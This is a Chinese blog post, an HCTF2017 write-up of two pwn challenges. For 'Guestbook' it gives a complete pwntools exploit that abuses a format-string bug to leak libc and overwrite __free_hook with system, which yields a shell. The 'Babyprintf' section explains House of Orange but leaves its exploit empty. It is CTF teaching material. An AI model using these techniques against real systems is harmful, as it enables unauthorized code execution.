<!DOCTYPE html>
<html>
<head>
  <meta name="referrer" content="no-referrer" />
  <!--解决简书外链403-->
  <meta charset="utf-8">
  <meta name="baidu-site-verification" content="L6Lm9d5Crl"/>
  
  
  
  
  <title>HCTF2017 level2的两道pwn题 | Hacked By Fish_o0O</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="0x00 一些歪道理比赛时pwn是肯定pwn不出来的，只有靠赛后复现才能够勉强维持得了尊严。不过确实能学到一些知识啊~">
<meta property="og:type" content="article">
<meta property="og:title" content="HCTF2017 level2的两道pwn题">
<meta property="og:url" content="http://fish-o0o.github.io/2017/11/21/HCTF2017%20Level2%E7%9A%84%E4%B8%A4%E9%81%93pwn%E9%A2%98/index.html">
<meta property="og:site_name" content="Hacked By Fish_o0O">
<meta property="og:description" content="0x00 一些歪道理比赛时pwn是肯定pwn不出来的，只有靠赛后复现才能够勉强维持得了尊严。不过确实能学到一些知识啊~">
<meta property="og:locale" content="zh">
<meta property="og:image" content="http://upload-images.jianshu.io/upload_images/8447551-5403723eaff21cbc.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="http://upload-images.jianshu.io/upload_images/8447551-339f7cc02478c519.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="http://upload-images.jianshu.io/upload_images/8447551-09854511818a7dba.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="http://upload-images.jianshu.io/upload_images/8447551-36626c7e8941ce37.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="article:published_time" content="2017-11-21T07:32:00.000Z">
<meta property="article:modified_time" content="2020-03-15T13:02:50.687Z">
<meta property="article:author" content="Fish_o0O">
<meta property="article:tag" content="Pwn">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://upload-images.jianshu.io/upload_images/8447551-5403723eaff21cbc.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
  
  
    <link rel="icon" href="/img/favicon.png">
  
  
  
<link rel="stylesheet" href="//cdn.bootcss.com/animate.css/3.5.0/animate.min.css">

  
  
<link rel="stylesheet" href="/css/style.css">

  <link rel="stylesheet" href="/font-awesome/css/font-awesome.min.css">
  <link rel="apple-touch-icon" href="/apple-touch-icon.png">
  
  
      <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  
  <!-- 加载特效 -->
    <script src="/js/pace.js"></script>
    <link href="/css/pace/pace-theme-flash.css" rel="stylesheet" />
  <script>
      var yiliaConfig = {
          fancybox: true,
          animate: true,
          isHome: false,
          isPost: true,
          isArchive: false,
          isTag: false,
          isCategory: false,
          open_in_new: false
      }
  </script>
<meta name="generator" content="Hexo 4.2.0"><link rel="alternate" href="/atom.xml" title="Hacked By Fish_o0O" type="application/atom+xml">
</head>

<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        
<script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>

        <a href="/" class="profilepic">
            
            <img lazy-src="/img/avatar.png" class="js-avatar">
            
        </a>
        <hgroup>
          <h1 class="header-author"><a href="/">Fish_o0O</a></h1>
        </hgroup>
        
        <p class="header-subtitle">KEEEEEEEEEP STUDY！</p>
        
        
            <form>
                <input type="text" class="st-default-search-input search" id="local-search-input" placeholder="搜索一下" autocomplete="off">
            </form>
            <div id="local-search-result"></div>
        
        
            <script type="text/javascript">
                (function() {
                    'use strict';
                    function getMatchData(keyword, data) {
                        var matchData = [];
                        for(var i =0;i<data.length;i++){
                            if(data[i].title.toLowerCase().indexOf(keyword)>=0) 
                                matchData.push(data[i])
                        }
                        return matchData;
                    }
                    var $input = $('#local-search-input');
                    var $resultContent = $('#local-search-result');
                    $input.keyup(function(){
                        $.ajax({
                            url: '/search.json',
                            dataType: "json",
                            success: function( json ) {
                                var str='<ul class=\"search-result-list\">';                
                                var keyword = $input.val().trim().toLowerCase();
                                $resultContent.innerHTML = "";
                                if ($input.val().trim().length <= 0) {
                                    $resultContent.empty();
                                    $('#switch-area').show();
                                    return;
                                }
                                var results = getMatchData(keyword, json);
                                if(results.length === 0){
                                    $resultContent.empty();
                                    $('#switch-area').show();
                                    return;
                                } 
                                for(var i =0; i<results.length; i++){
                                    str += "<li><a href='"+ results[i].url +"' class='search-result-title'>"+ results[i].title +"</a></li>";
                                }
                                str += "</ul>";
                                $resultContent.empty();
                                $resultContent.append(str);
                                $('#switch-area').hide();
                            }
                        });
                    });
                })();
            </script>
        
        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        
                        <div class="icon-wrap icon-me hide" data-idx="3">
                            <div class="user"></div>
                            <div class="shoulder"></div>
                        </div>
                        
                    </div>
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>菜单</li>
                        <li>标签</li>
                        
                        
                        <li>关于我</li>
                        
                    </ul>
                </div>
            </div>
        
        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a  href="/">主页</a></li>
                        
                            <li><a  href="/archives/">所有文章</a></li>
                        
                            <li><a  href="/about/">关于我</a></li>
                        
                            <li><a  href="/tags/">标签</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fl github"  target="_blank" href="https://github.com/Fish-o0O" title="github">github</a>
                            
                                <a class="fl 简书"  target="_blank" href="https://www.jianshu.com/u/7343624d69c4" title="简书">简书</a>
                            
                                <a class="fl rss"  target="_blank" href="/atom.xml" title="rss">rss</a>
                            
                        </ul>
                    </nav>
                </section>
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        <a href="/tags/Pwn/" style="font-size: 20px;">Pwn</a> <a href="/tags/Vulnerability/" style="font-size: 10px;">Vulnerability</a> <a href="/tags/%E9%9A%8F%E7%AC%94/" style="font-size: 15px;">随笔</a>
                    </div>
                </section>
                
                
                
                
                <section class="switch-part switch-part3">
                
                    <div id="js-aboutme">一个被兴趣牵着鼻子走的菜鸡</div>
                </section>
                
            </div>
        </div>
    </header>
</div>

    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="回到主页">Fish_o0O</a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                
                    <img lazy-src="/img/avatar.png" class="js-avatar">
                
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="回到主页">Fish_o0O</a></h1>
            </hgroup>
            
            <p class="header-subtitle">KEEEEEEEEEP STUDY！</p>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/">主页</a></li>
                
                    <li><a href="/archives/">所有文章</a></li>
                
                    <li><a href="/about/">关于我</a></li>
                
                    <li><a href="/tags/">标签</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                <div class="social">
                    
                        <a class="github" target="_blank" href="https://github.com/Fish-o0O" title="github">github</a>
                    
                        <a class="简书" target="_blank" href="https://www.jianshu.com/u/7343624d69c4" title="简书">简书</a>
                    
                        <a class="rss" target="_blank" href="/atom.xml" title="rss">rss</a>
                    
                </div>
            </nav>
        </header>
    </div>
</nav>
      <div class="body-wrap"><article id="post-HCTF2017 Level2的两道pwn题" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a  href="/2017/11/21/HCTF2017%20Level2%E7%9A%84%E4%B8%A4%E9%81%93pwn%E9%A2%98/" class="article-date">
      <time datetime="2017-11-21T07:32:00.000Z" itemprop="datePublished">2017-11-21</time>
</a>

    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      HCTF2017 level2的两道pwn题
    </h1>
  


      </header>
      
      <div class="article-info article-info-post">
        

        
    <div class="article-tag tagcloud">
        <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Pwn/" rel="tag">Pwn</a></li></ul>
    </div>

        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <h2 id="0x00-一些歪道理"><a href="#0x00-一些歪道理" class="headerlink" title="0x00 一些歪道理"></a>0x00 一些歪道理</h2><p>比赛时pwn是肯定pwn不出来的，只有靠赛后复现才能够勉强维持得了尊严。不过确实能学到一些知识啊~</p>
<a id="more"></a>
<h2 id="0x01-Guestbook"><a href="#0x01-Guestbook" class="headerlink" title="0x01 Guestbook"></a>0x01 Guestbook</h2><ul>
<li><strong>题目信息</strong></li>
</ul>
<p>该题目是一个Linux下32位的动态链接可执行文件并且checksec显示开了所有的保护机制。程序有<strong>add</strong>、<strong>see</strong>、<strong>del</strong>三个功能，能够增加客人、查看客人、删除客人。<img src="http://upload-images.jianshu.io/upload_images/8447551-5403723eaff21cbc.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="checksec"></p>
<ul>
<li><strong>漏洞位置</strong></li>
</ul>
<p>通过ida反汇编分析可得到数据结构如下：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">guest</span>&#123;</span></span><br><span class="line">    <span class="keyword">int</span> a;    <span class="comment">//我也不知道这是啥反正永远那都是1</span></span><br><span class="line">    <span class="keyword">char</span> name[<span class="number">32</span>];</span><br><span class="line">    <span class="class"><span class="keyword">struct</span> *<span class="title">heap_ptr</span>;</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">heap_ptr</span>&#123;</span></span><br><span class="line">    <span class="keyword">char</span> phone[<span class="number">16</span>];</span><br><span class="line">&#125;    <span class="comment">//malloc了大小为16的空间用于存放phone</span></span><br></pre></td></tr></table></figure>
<p>并且最多<strong>add</strong>10个guest，在<strong>see</strong>功能处有明显的格式化字符串漏洞，在<strong>del</strong>时会将<strong>name</strong>域请零，并且将<strong>heap_ptr</strong>指向<strong>phone</strong>的指针给<strong>free</strong>掉。<img src="http://upload-images.jianshu.io/upload_images/8447551-339f7cc02478c519.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="漏洞位置"></p>
<ul>
<li><strong>利用思路</strong><br>由于保护机制全开，首先需要利用格式化字符串<strong>leak</strong>程序及<strong>libc</strong>基址，但是<strong>got表</strong>不可写，常用的格式化字符串写<strong>got表</strong>思路不可取。而在调用<strong>del</strong>时会调用<strong>free(heap_ptr)</strong>，进而出发触发<strong>free_hook</strong>。若将<strong>free_hook</strong>劫持为<strong>system</strong>函数，<strong>heap_ptr</strong>指向<strong>/bin/sh</strong>字符串，则可起shell。</li>
</ul>
<blockquote>
<p><strong>hook</strong><br>一些函数存在<strong>hook</strong>指针供调试使用(如<strong>free</strong>、<strong>malloc</strong>等)，通常为空指针，若<strong>hook</strong>值不为空，则在调用该函数之前先调用<strong>hook</strong>中的函数。</p>
</blockquote>
<ul>
<li><strong>My-exp</strong><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">local = <span class="number">1</span></span><br><span class="line"><span class="keyword">if</span> local:</span><br><span class="line">	p = process(<span class="string">'./guestbook'</span>)</span><br><span class="line">	libc = ELF(<span class="string">'/lib32/libc-2.23.so'</span>)</span><br><span class="line">	gdb.attach(p , open(<span class="string">'aa'</span>))</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">	p = remote(<span class="string">'47.100.64.171'</span> , <span class="number">20002</span>)<span class="comment">#nc 47.100.64.171 20002</span></span><br><span class="line">	libc = ELF(<span class="string">'./libc.so.6'</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span><span class="params">(name)</span>:</span></span><br><span class="line">	p.recv(<span class="number">1024</span>)</span><br><span class="line">	p.sendline(<span class="string">'1'</span>)</span><br><span class="line">	p.recvuntil(<span class="string">'name?\n'</span>)</span><br><span class="line">	p.sendline(name)</span><br><span class="line">	p.recvuntil(<span class="string">'phone?\n'</span>)</span><br><span class="line">	p.sendline(<span class="string">'1234567812345678'</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">see</span><span class="params">(index)</span>:</span></span><br><span class="line">	p.recv(<span class="number">1024</span>)</span><br><span class="line">	p.sendline(<span class="string">'2'</span>)</span><br><span class="line">	p.recvuntil(<span class="string">'index:\n'</span>)</span><br><span class="line">	p.sendline(index)</span><br><span class="line">	p.recvuntil(<span class="string">'name:'</span>)</span><br><span class="line">	ret = p.recvuntil(<span class="string">'\n'</span>)[:<span class="number">-1</span>]</span><br><span class="line">	<span class="keyword">return</span> ret</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">dele</span><span class="params">(index)</span>:</span></span><br><span class="line">	p.recv(<span class="number">1024</span>)</span><br><span class="line">	p.sendline(<span class="string">'3'</span>)</span><br><span class="line">	p.recvuntil(<span class="string">'index:\n'</span>)</span><br><span class="line">	p.sendline(index)</span><br><span class="line">	p.recvuntil(<span class="string">'\n'</span>)</span><br><span class="line"></span><br><span class="line">elf = ELF(<span class="string">'./guestbook'</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#step1 use fsb to leak libc &amp; elf base by the way find some func addr</span></span><br><span class="line">add(<span class="string">'%p-%3$p'</span>)</span><br><span class="line">leak = see(<span class="string">'0'</span>)</span><br><span class="line">elf.address = int(leak.split(<span class="string">'-'</span>)[<span class="number">0</span>] , <span class="number">16</span>) - <span class="number">0xe3a</span></span><br><span class="line">libc.address = int(leak.split(<span class="string">'-'</span>)[<span class="number">1</span>] , <span class="number">16</span>) - <span class="number">0x1b0da7</span></span><br><span class="line">system_addr = libc.symbols[<span class="string">'system'</span>]</span><br><span class="line">binsh_addr = libc.search(<span class="string">'/bin/sh'</span>).next()</span><br><span class="line">free_hook = libc.address + <span class="number">0x1b18b0</span></span><br><span class="line">heap_ptr = elf.address + <span class="number">0x3064</span></span><br><span class="line">log.info(<span class="string">'elf_addr =&gt; '</span> + hex(elf.address))</span><br><span class="line">log.info(<span class="string">'libc_addr =&gt; '</span> + hex(libc.address))</span><br><span class="line">log.info(<span class="string">'system_addr =&gt; '</span> + hex(system_addr))</span><br><span class="line">log.info(<span class="string">'binsh_addr =&gt; '</span> + hex(binsh_addr))</span><br><span class="line">log.info(<span class="string">'free_hook =&gt; '</span> + hex(free_hook))</span><br><span class="line"></span><br><span class="line"><span class="comment">#step2 write free_hook with system</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">4</span>):</span><br><span class="line">	length = ord(p32(system_addr)[i])</span><br><span class="line">	payload = <span class="string">'aaa'</span> + p32(free_hook + i)</span><br><span class="line">	payload += <span class="string">'%'</span> + str(length - len(payload)) + <span class="string">'c%8$hhn'</span></span><br><span class="line">	add(payload)</span><br><span class="line">	see(str(i + <span class="number">1</span>))</span><br><span class="line"></span><br><span class="line"><span class="comment">#step3 write heap_ptr with binsh</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">4</span>):</span><br><span class="line">	length = ord(p32(binsh_addr)[i])</span><br><span class="line">	payload = <span class="string">'aaa'</span> + p32(heap_ptr + i)</span><br><span class="line">	payload += <span class="string">'%'</span> + str(length - len(payload)) + <span class="string">'c%8$hhn'</span></span><br><span class="line">	add(payload)</span><br><span class="line">	see(str(i + <span class="number">5</span>))</span><br><span class="line"></span><br><span class="line"><span class="comment">#step4 call free(heap_ptr) -&gt; free_hook(heap_ptr) -&gt; system('/bin/sh')</span></span><br><span class="line">p.recvuntil(<span class="string">"choice:"</span>)</span><br><span class="line">p.sendline(<span class="string">'3'</span>)</span><br><span class="line">p.sendline(<span class="string">'0'</span>)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
</li>
</ul>
<hr>
<h2 id="0x02-Babyprintf"><a href="#0x02-Babyprintf" class="headerlink" title="0x02 Babyprintf"></a>0x02 Babyprintf</h2><ul>
<li><strong>题目信息</strong></li>
</ul>
<p>该题目是一个Linux下64位的动态链接可执行文件并且checksec显示开了所有的保护机制。能够自己定义<strong>size</strong>大小，输入<strong>string</strong>得到<strong>result</strong>然后一直循环这个过程。<br><img src="http://upload-images.jianshu.io/upload_images/8447551-09854511818a7dba.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="checksec"></p>
<ul>
<li><strong>漏洞位置</strong><br>用ida分析，整个程序简洁明了，功能完善，短小精悍，实乃精品。在<strong>size</strong>处我们可以申请任意长度的堆地址；<strong>string</strong>是通过<strong>gets</strong>进堆的，存在堆溢出漏洞；打印<strong>result</strong>时存在<del>格式化字符串漏洞</del>。<img src="http://upload-images.jianshu.io/upload_images/8447551-36626c7e8941ce37.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="漏洞位置"></li>
</ul>
<ul>
<li><strong>利用思路</strong><br>然鹅本程序开了FORTIFY保护机制，该机制引入了<strong>__printf_chk</strong>函数，导致你在使用<strong>%a$p</strong>时需要<strong>同时</strong>使用<strong>%(1到a)$p</strong>才可以，并且<strong>禁用了%n</strong>，所以利用格式化字符串写的这条路基本被pass掉，只有可能进行一些简单的<strong>leak</strong>。所以只有堆溢出可以尝试一下，却只有<strong>malloc</strong>而没有<strong>free</strong>，几乎玩不起来。在网上搜到了当时<strong>Hitcon2016</strong>中<strong>House of Orange</strong>的利用技巧，参考了两篇文章:<em><a href="http://bobao.360.cn/ctf/detail/178.html" target="_blank" rel="noopener">创造奇迹的Top Chunk</a>*以及</em><a href="http://www.cnblogs.com/shangye/p/6268981.html" target="_blank" rel="noopener">ctf-HITCON-2016-houseoforange学习</a><em>。利用堆溢出将*</em>top chunk<strong>修改为满足下列条件的值后，再次</strong>malloc<strong>比</strong>fake top chunk<strong>更大的空间时将会创建一个</strong>新的堆块<strong>并调用</strong>init_free<strong>将</strong>旧堆块<strong>中的</strong>fake top chunk<strong>给</strong>free<strong>掉，即可利用此机制构造</strong>fake top chunk size<strong>实现</strong>fastbin attack<strong>或</strong>unsort bin attack**。</li>
</ul>
<blockquote>
<p><strong>触发_init_free的条件</strong><br>   1.大于MINSIZE(0X10)<br>   2.小于所需的大小 + MINSIZE<br>   3.prev inuse位设置为1<br>   4.old_top + oldsize要在一个页中.</p>
</blockquote>
<ul>
<li><strong>My-exp</strong><pre><code class="python"></code></pre>
</li>
</ul>

      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>本文标题:</span><a  href="/2017/11/21/HCTF2017%20Level2%E7%9A%84%E4%B8%A4%E9%81%93pwn%E9%A2%98/">HCTF2017 level2的两道pwn题</a></p>
        <p><span>文章作者:</span><a  href="/" title="访问 Fish_o0O 的个人博客">Fish_o0O</a></p>
        <p><span>发布时间:</span>2017年11月21日 - 07时32分</p>
        <p><span>最后更新:</span>2020年03月15日 - 13时02分</p>
        <p>
            <span>原始链接:</span><a class="post-url" href="/2017/11/21/HCTF2017%20Level2%E7%9A%84%E4%B8%A4%E9%81%93pwn%E9%A2%98/" title="HCTF2017 level2的两道pwn题">http://fish-o0o.github.io/2017/11/21/HCTF2017%20Level2%E7%9A%84%E4%B8%A4%E9%81%93pwn%E9%A2%98/</a>
            <span class="copy-path" data-clipboard-text="原文: http://fish-o0o.github.io/2017/11/21/HCTF2017%20Level2%E7%9A%84%E4%B8%A4%E9%81%93pwn%E9%A2%98/　　作者: Fish_o0O" title=""></span>
        </p>
        <p>
            <span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license noopener" href="http://creativecommons.org/licenses/by-nc-sa/3.0/cn/" target="_blank" title="中国大陆 (CC BY-NC-SA 3.0 CN)" target = "_blank">"署名-非商用-相同方式共享 3.0"</a> 转载请保留原文链接及作者。
        </p>
    </div>



<nav id="article-nav">
  
    <a  href="/2018/03/07/CVE-2017-0199%20Microsoft%20Office%20%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%92%8C%E5%88%A9%E7%94%A8/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption"><</strong>
      <div class="article-nav-title">
        
          CVE-2017-0199 Microsoft Office 逻辑漏洞复现和利用
        
      </div>
    </a>
  
  
    <a  href="/2017/11/08/%E5%88%B7Jarvis%20OJ%E6%97%B6%E5%AD%A6%E5%88%B0%E7%9A%84%E6%96%B0%E5%A7%BF%E5%8A%BF%5B%E4%B8%8D%E5%AE%9A%E6%97%B6%E6%9B%B4%E6%96%B0%5D/" id="article-nav-older" class="article-nav-link-wrap">
      <div class="article-nav-title">刷Jarvis OJ时学到的新姿势【不定时更新】</div>
      <strong class="article-nav-caption">></strong>
    </a>
  
</nav>


  
</article>

    <div id="toc" class="toc-article">
    <strong class="toc-title">文章目录</strong>
    <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x00-一些歪道理"><span class="toc-number">1.</span> <span class="toc-text">0x00 一些歪道理</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-Guestbook"><span class="toc-number">2.</span> <span class="toc-text">0x01 Guestbook</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-Babyprintf"><span class="toc-number">3.</span> <span class="toc-text">0x02 Babyprintf</span></a></li></ol>
</div>
<style>
    .left-col .switch-btn {
        display: none;
    }
    .left-col .switch-area {
        display: none;
    }
</style>
<input type="button" id="tocButton" value="隐藏目录"  title="点击按钮隐藏或者显示文章目录">

<script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>

<script>
    var valueHide = "隐藏目录";
    var valueShow = "显示目录";
    if ($(".left-col").is(":hidden")) {
        $("#tocButton").attr("value", valueShow);
    }
    $("#tocButton").click(function() {
        if ($("#toc").is(":hidden")) {
            $("#tocButton").attr("value", valueHide);
            $("#toc").slideDown(320);
            $(".switch-btn, .switch-area").fadeOut(300);
        }
        else {
            $("#tocButton").attr("value", valueShow);
            $("#toc").slideUp(350);
            $(".switch-btn, .switch-area").fadeIn(500);
        }
    })
    if ($(".toc").length < 1) {
        $("#toc, #tocButton").hide();
        $(".switch-btn, .switch-area").show();
    }
</script>






    



    <div class="scroll" id="post-nav-button">
        
            <a  href="/2018/03/07/CVE-2017-0199%20Microsoft%20Office%20%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%92%8C%E5%88%A9%E7%94%A8/" title="上一篇: CVE-2017-0199 Microsoft Office 逻辑漏洞复现和利用">
                <i class="fa fa-angle-left"></i>
            </a>
        
        <a title="文章列表"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>
        
            <a  href="/2017/11/08/%E5%88%B7Jarvis%20OJ%E6%97%B6%E5%AD%A6%E5%88%B0%E7%9A%84%E6%96%B0%E5%A7%BF%E5%8A%BF%5B%E4%B8%8D%E5%AE%9A%E6%97%B6%E6%9B%B4%E6%96%B0%5D/" title="下一篇: 刷Jarvis OJ时学到的新姿势【不定时更新】">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>
    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2019/12/29/FILE%E7%BB%93%E6%9E%84%E4%BD%93%E5%8F%8A%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95/">FILE结构体及漏洞利用方法</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/24/%E5%B0%81%E4%BA%86%E4%B8%AA%E5%BA%93/">封了个库</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/09/14/Tcache%E6%9C%BA%E5%88%B6%E5%8F%8A%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95/">Tcache机制及漏洞利用方法</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/08/17/Windows%E7%B3%BB%E7%BB%9F%E4%B8%8B%E5%85%B8%E5%9E%8B%E5%A0%86%E6%BC%8F%E6%B4%9E%E4%BA%A7%E7%94%9F%E5%8E%9F%E7%90%86%E5%8F%8A%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95%E7%A0%94%E7%A9%B6/">Windows系统下典型堆漏洞产生原理及利用方法研究</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/05/10/CISCN2019%20%E5%9B%BD%E8%B5%9B%E7%BA%BF%E4%B8%8A%E5%88%9D%E8%B5%9Bpwn/">CISCN2019 国赛线上初赛pwn</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/15/CVE-2012-0158%20Microsoft%20Office%20%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/">CVE-2012-0158 Microsoft Office 栈溢出漏洞分析</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/12/29/Ubuntu%E8%99%9A%E6%8B%9F%E6%9C%BA%E6%89%A9%E5%AE%B9%20Step%20by%20Step/">Ubuntu虚拟机扩容 Step by Step</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/12/15/%E7%BD%91%E9%BC%8E%E6%9D%AF%E7%AC%AC%E4%B8%80%E5%9C%BAWriteup/">网鼎杯第一场Writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/11/27/XNUCA2018%E5%88%9D%E8%B5%9Bpwn%20writeup/">XNUCA2018初赛pwn writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/09/20/BCTF2018%20baby_arena/">BCTF2018 baby_arena</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/08/19/0CTF2018%20babyheap/">0CTF2018 babyheap</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/06/26/CVE-2017-8570%20Microsoft%20Office%20%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%92%8C%E5%88%A9%E7%94%A8/">CVE-2017-8570 Microsoft Office 逻辑漏洞复现和利用</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/06/03/%E7%AC%AC%E4%BA%8C%E5%B1%8A%E5%BC%BA%E7%BD%91%E6%9D%AFpwn%20writeup%E3%80%90%E9%83%A8%E5%88%86%E3%80%91/">第二届强网杯pwn writeup【部分】</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/03/07/CVE-2017-0199%20Microsoft%20Office%20%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%92%8C%E5%88%A9%E7%94%A8/">CVE-2017-0199 Microsoft Office 逻辑漏洞复现和利用</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/11/21/HCTF2017%20Level2%E7%9A%84%E4%B8%A4%E9%81%93pwn%E9%A2%98/">HCTF2017 level2的两道pwn题</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/11/08/%E5%88%B7Jarvis%20OJ%E6%97%B6%E5%AD%A6%E5%88%B0%E7%9A%84%E6%96%B0%E5%A7%BF%E5%8A%BF%5B%E4%B8%8D%E5%AE%9A%E6%97%B6%E6%9B%B4%E6%96%B0%5D/">刷Jarvis OJ时学到的新姿势【不定时更新】</a></li><li class="post-list-item"><a class="post-list-link" 